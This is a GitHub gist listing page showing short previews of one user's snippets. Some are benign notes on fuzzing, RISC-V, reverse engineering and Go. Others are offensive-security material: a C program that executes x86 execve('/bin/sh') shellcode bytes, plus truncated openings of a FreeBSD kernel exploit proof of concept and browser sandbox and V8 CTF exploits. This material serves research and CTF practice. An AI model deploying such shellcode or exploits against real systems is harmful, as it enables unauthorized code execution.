Skip to content

Instantly share code, notes, and snippets.

View shxdow's full-sized avatar

shxdow

46 followers · 107 following
View GitHub Profile
@shxdow
shxdow / fuzzer.py
Created July 8, 2017 20:20
Fuzzer for PDF readers in Linux (HW for UdaCity CS258 Problem Set 4)
#!/usr/bin/env python
import random
import os
import time
import subprocess
import math
apps = (
"emacs",
@shxdow
shxdow / gist:5e5ecbe037a1f3248d1908690f783623
Created July 9, 2017 08:18 — forked from rxaviers/gist:7360908
Complete list of github markdown emoji markup

People

:bowtie: :bowtie: 😄 :smile: 😆 :laughing:
😊 :blush: 😃 :smiley: ☺️ :relaxed:
😏 :smirk: 😍 :heart_eyes: 😘 :kissing_heart:
😚 :kissing_closed_eyes: 😳 :flushed: 😌 :relieved:
😆 :satisfied: 😁 :grin: 😉 :wink:
😜 :stuck_out_tongue_winking_eye: 😝 :stuck_out_tongue_closed_eyes: 😀 :grinning:
😗 :kissing: 😙 :kissing_smiling_eyes: 😛 :stuck_out_tongue:
@shxdow
shxdow / shellcode.c
Created August 7, 2017 10:32 — forked from securitytube/shellcode.c
C Program to test shellcode
#include <stdio.h>
#include <string.h>
unsigned char code[] = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main () {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
@shxdow
shxdow / RISC-V.md
Created November 1, 2020 19:26 — forked from erincandescent/RISC-V.md

Foreward

This document was originally written several years ago. At the time I was working as an execution core verification engineer at Arm. The following points are coloured heavily by working in and around the execution cores of various processors. Apply a pinch of salt; points contain varying degrees of opinion.

It is still my opinion that RISC-V could be much better designed; though I will also say that if I was building a 32 or 64-bit CPU today I'd likely implement the architecture to benefit from the existing tooling.

Mostly based upon the RISC-V ISA spec v2.0. Some updates have been made for v2.2

Original Foreword: Some Opinion

The RISC-V ISA has pursued minimalism to a fault. There is a large emphasis on minimizing instruction count, normalizing encoding, etc. This pursuit of minimalism has resulted in false orthogonalities (such as reusing the same instruction for branches, calls and returns) and a requirement for superfluous instructions which impacts code density both in terms of size and

@shxdow
shxdow / gist:7baaf4440a02203823c68e0019946daa
Created November 11, 2020 20:07 — forked from trietptm/gist:8195027
A lot of valuable advice from Rolf Rolles http://magazine.hitb.org/issues/HITB-Ezine-Issue-005.pdf
Bài phỏng vấn Rolf Rolles của HITB hay đến từng cm :D , đây mới đúng là hacker:
http://magazine.hitb.org/issues/HITB-Ezine-Issue-005.pdf
What are your favorite reverse engineering tools?
IDA, Resource Hacker, 010 Editor, VMWare, SoftICE, and those that I develop myself.
How would you describe the process of reverse engineering to a beginner?
Step 0: Pose a question (how is the program accomplishing X?).
Step 1: Find a portion of the code relevant to the inquiry via a variety of static and dynamic means.
Step 2: Analyze that code to obtain information; annotate the binary with what you have learned.
@shxdow
shxdow / go_io-read_packages.md
Created February 19, 2021 17:37 — forked from suntong/go_io-read_packages.md
[go-nuts] Differences between os, io, ioutils, bufio, bytes (with Buffer type) packages for file reading

http://grokbase.com/t/gg/golang-nuts/142spmv4fe/go-nuts-differences-between-os-io-ioutils-bufio-bytes-with-buffer-type-packages-for-file-reading

I'm quite confused as there seems to be multiple redundant ways to solve my problem (read a file, parse the content, serve it via http). Most people on stackoverflow would use bufio, but I just can't get the differences between this package and the Buffer type of bytes and just reading a file with the os methods. Also I don't know when and why I should choose those ways to do it, when I have the simple, but non-versatile, ioutils.ReadFile.

@shxdow
shxdow / ip6_expl_poc.c
Created April 11, 2021 11:15 — forked from Cryptogenic/ip6_expl_poc.c
Kernel exploit POC (Proof-of-Concept) for IP6_EXTHDR_CHECK double free (CVE-2020-9892). Interleaves with multi-threads for code exec. Mainly a reference for PS4 implementation.
/*
* IP6_EXTHDR_CHECK Double Free (CVE-2020-9892) Exploit PoC for FreeBSD 9.0
* https://github.com/google/security-research/security/advisories/GHSA-gxcr-cw4q-9q78
* -
* Bug credit: Andy Nguyen (@theflow0)
* Exploit credit: @SpecterDev, @tihmstar
* Thanks: @sleirsgoevy, @littlelailo, flatz (@flat_z), @balika011
* -
* Build: gcc -o expl ip6_expl_poc.c -pthread
* -
@shxdow
shxdow / redpwn-empires.html
Created April 19, 2022 23:02 — forked from hkraw/redpwn-empires.html
<html>
<head>
<title>RedPwn sbx-1</title>
</head>
<body>
<h1>:thonk:</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./third_party/blink/public/mojom/desert.mojom.js'></script>
@shxdow
shxdow / 0ctf2020-fullchain++-cfi.html
Created April 19, 2022 23:02 — forked from hkraw/0ctf2020-fullchain++-cfi.html
<html>
<head>
<title>0ctf sbx</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script>
@shxdow
shxdow / should've_had_a_v8_exploit.md
Created April 19, 2022 23:03 — forked from hkraw/should've_had_a_v8_exploit.md
UIUCTF-2021

Exploit (First blood)

let wasm_code = new Uint8Array([
  0, 97,115,109,  1,  0,  0,  0,  1,133,128,128,128,  0,
  1, 96,  0,  1,127,  3,130,128,128,128,  0,  1,  0,  4,
  132,128,128,128,  0,  1,112,  0,  0,  5,131,128,128,128,
  0,  1,  0,  1,  6,129,128,128,128,  0,  0,  7,145,128,
  128,128,  0,2,6,109,101,109,111,114,121,2,0,4,109,97,
  105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
  0,65,42,11